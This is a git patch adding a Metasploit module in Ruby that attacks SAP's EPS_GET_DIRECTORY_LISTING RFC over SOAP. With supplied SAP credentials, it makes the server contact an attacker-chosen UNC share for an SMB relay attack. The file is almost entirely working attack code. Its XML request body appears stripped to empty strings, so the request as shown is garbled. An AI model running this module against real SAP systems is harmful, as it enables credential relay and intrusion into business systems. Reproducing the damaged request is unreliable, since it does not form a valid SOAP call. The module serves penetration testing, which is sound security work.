From bcc26427c088b0e85156cdfa667bf200365189cb Mon Sep 17 00:00:00 2001 From: nmonkee Date: Mon, 25 Mar 2013 20:26:56 +0000 Subject: [PATCH] EPS_GET_DIRECTORY_LISTING (List Directory abd SMB Relay) --- ...rfc_eps_get_directory_listing_smb_relay.rb | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing_smb_relay.rb diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing_smb_relay.rb new file mode 100644 index 0000000000..7869b3d44b --- /dev/null +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing_smb_relay.rb @@ -0,0 +1,88 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +## +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# http://www.onapsis.com/research-free-solutions.php. +# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts +# in producing the Metasploit modules and was happy to share his knowledge and +# experience - a very cool guy. +# +# The following guys from ERP-SCAN deserve credit for their contributions - +# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and +# Dmitry Evdokimov. +# +# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis +# who have Beta tested the modules and provided excellent feedback. Some people +# just seem to enjoy hacking SAP :) +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'EPS_GET_DIRECTORY_LISTING (list directory + SMB Relay)', + 'Description' => %q{ + A vulnerability in the SAP EPS RFC function group allows an attacker to execute an SMB relay attack. + }, + 'References' => [['URL','http://labs.mwrinfosecurity.com']], + 'Author' => ['nmonkee'], + 'License' => MSF_LICENSE + ) + + register_options([ + OptString.new('CLIENT', [true, 'SAP client', nil]), + OptString.new('USER', [true, 'Username', nil]), + OptString.new('PASS', [true, 'Password', nil]), + OptString.new('PATH',[true,'File path (e.g. \\\\xx.xx.xx.xx\\share)',nil]) + ], self.class) + end + + def run_host(ip) + data = '' + data << '' + data << '' + data << '' + data << '' + data << '' + datastore['PATH'] + '' + data << '' + data << '' + data << '' + + user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS']) + begin + print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}") + res = send_request_raw({ + 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'method' => 'POST', + 'data' => data, + 'headers' =>{ + 'Content-Length' => data.size.to_s, + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'Authorization' => 'Basic ' + user_pass, + 'Content-Type' => 'text/xml; charset=UTF-8',} + }, 45) + if res + vprint_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s) + vprint_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s) + vprint_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s) + end + rescue ::Rex::ConnectionError + print_error("#{rhost}:#{rport} - Unable to connect") + return + end + end + end